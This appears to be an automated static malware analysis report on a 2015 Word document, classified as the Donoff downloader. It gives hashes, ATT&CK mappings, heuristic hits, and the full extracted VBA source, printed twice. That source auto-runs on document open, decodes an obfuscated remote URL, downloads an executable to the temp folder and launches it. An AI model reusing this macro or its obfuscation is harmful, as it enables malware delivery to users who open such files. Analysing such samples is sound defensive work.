Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 54010a02432cfa53…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 54.0 KB
Created: 2015-09-03 18:54:00
Authoring application: Microsoft Office Word
First seen: 2015-09-14
MD5: f6a13b7e285e43d2c9dccf8b10517323
SHA-1: 3cfeba9d84e79fa9d6410450553c2d8f0f4daf4c
SHA-256: 54010a02432cfa53f6a05af6f1dfb908511e3ef13cfd5b6a790799087be5df4a
Risk score: 258

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1059 Command and Scripting Interpreter
  • T1105 Ingress Tool Transfer

The sample contains VBA macros that call URLDownloadToFile to fetch a second-stage payload into the user's temporary directory (resolved via Environ$("tmp")), then launch the downloaded file with ShellExecute. The ClamAV detection 'Doc.Downloader.Donoff-6700491-0' further supports the downloader classification. The download URL is not stored in the clear: the obfuscated string 'ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui' is passed through the macro's own Decrypt() routine at runtime (the string is reversed and each character code is decremented by one), which is itself highly suspicious.

Heuristics (8)

  • ClamAV: Doc.Downloader.Donoff-6700491-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Donoff-6700491-0
  • Reference to URLDownloadToFile API [critical, SC_STR_URLDOWNLOAD]
  • VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]
    Document contains VBA macro code
  • URLDownloadToFile in VBA [critical, OLE_VBA_DOWNLOAD]
    Matched line in script:
    "URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _
  • Document_Open macro [low, OLE_VBA_DOCOPEN]
    Matched line in script:
    Private Sub Document_Open()
  • Environ() call (env variable access) [low, OLE_VBA_ENVIRON]
    Matched line in script:
    rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH
  • Reference to ShellExecute API [high, SC_STR_SHELLEXEC]
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3018 bytes
SHA-256: 4eba1d0fa2664a2e5ad04d80f626fe0f3dcb7c4215797bd87f8995b2409e81ff

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Macro Name: rCwOyUEPUQd

Private Declare PtrSafe Function hzwSoNSObetOP Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal DcFkT As Long, ByVal PEYPGTe As String, _
ByVal MMAmNkwKsJvzZNKEWUrMlrnz As String, ByVal CQnoxHCgvNiBvlQZ As String, ByVal bYeOHOtGFV As String, ByVal YcTtHAlSUpRWkuPdQCeAzb As Long) As Long

Private Declare PtrSafe Function loIypDNwwjkK Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _
ByVal jzAVXhEmPfLRltiOJJ As String, ByVal INyryd As Long, ByVal DpFIL As Long) As Long

Private Sub rCwOyUEPUQd()
Dim iDrAXSwyfyEMBhqrpuRX As String, qUhhwADuTjcLtwQtxLH As String, rEeeFNZCVBYrQ As String, uIQRbztWYFL As String, fndIDECHszG As String, WxxMDFxWze As String
qUhhwADuTjcLtwQtxLH = Decrypt("fyf/byy")
rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH


iDrAXSwyfyEMBhqrpuRX = Decrypt("ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui")

loIypDNwwjkK 0, iDrAXSwyfyEMBhqrpuRX, rEeeFNZCVBYrQ, 0, 0
hzwSoNSObetOP 0, "open", rEeeFNZCVBYrQ, "", vbNullString, vbNormalFocus
End Sub

Private Sub Document_Open()

rCwOyUEPUQd
End Sub

Private Function Decrypt(enc)
    Dim x, i, tmp
    enc = StrReverse(enc)
    For i = 1 To Len(enc)
        x = Mid(enc, i, 1)
        tmp = tmp & Chr(Asc(x) - 1)
    Next
    Decrypt = tmp
End Function


Attribute VB_Name = "NewMacros"
'Macro Name: rCwOyUEPUQd

Private Declare PtrSafe Function hzwSoNSObetOP Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal DcFkT As Long, ByVal PEYPGTe As String, _
ByVal MMAmNkwKsJvzZNKEWUrMlrnz As String, ByVal CQnoxHCgvNiBvlQZ As String, ByVal bYeOHOtGFV As String, ByVal YcTtHAlSUpRWkuPdQCeAzb As Long) As Long

Private Declare PtrSafe Function loIypDNwwjkK Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal TgIcGfxJxuoGDbK As Long, ByVal UbW As String, _
ByVal jzAVXhEmPfLRltiOJJ As String, ByVal INyryd As Long, ByVal DpFIL As Long) As Long

Private Sub rCwOyUEPUQd()
Dim iDrAXSwyfyEMBhqrpuRX As String, qUhhwADuTjcLtwQtxLH As String, rEeeFNZCVBYrQ As String, uIQRbztWYFL As String, fndIDECHszG As String, WxxMDFxWze As String
qUhhwADuTjcLtwQtxLH = Decrypt("fyf/byy")
rEeeFNZCVBYrQ = Environ$("tmp") & "\" & qUhhwADuTjcLtwQtxLH


iDrAXSwyfyEMBhqrpuRX = Decrypt("ebpmoxpe@cpmc0103OL8cei70tfmjg020jqb0uu/fh00;quui")

loIypDNwwjkK 0, iDrAXSwyfyEMBhqrpuRX, rEeeFNZCVBYrQ, 0, 0
hzwSoNSObetOP 0, "open", rEeeFNZCVBYrQ, "", vbNullString, vbNormalFocus
End Sub

Private Sub Document_Open()

rCwOyUEPUQd
End Sub

Private Function Decrypt(enc)
    Dim x, i, tmp
    enc = StrReverse(enc)
    For i = 1 To Len(enc)
        x = Mid(enc, i, 1)
        tmp = tmp & Chr(Asc(x) - 1)
    Next
    Decrypt = tmp
End Function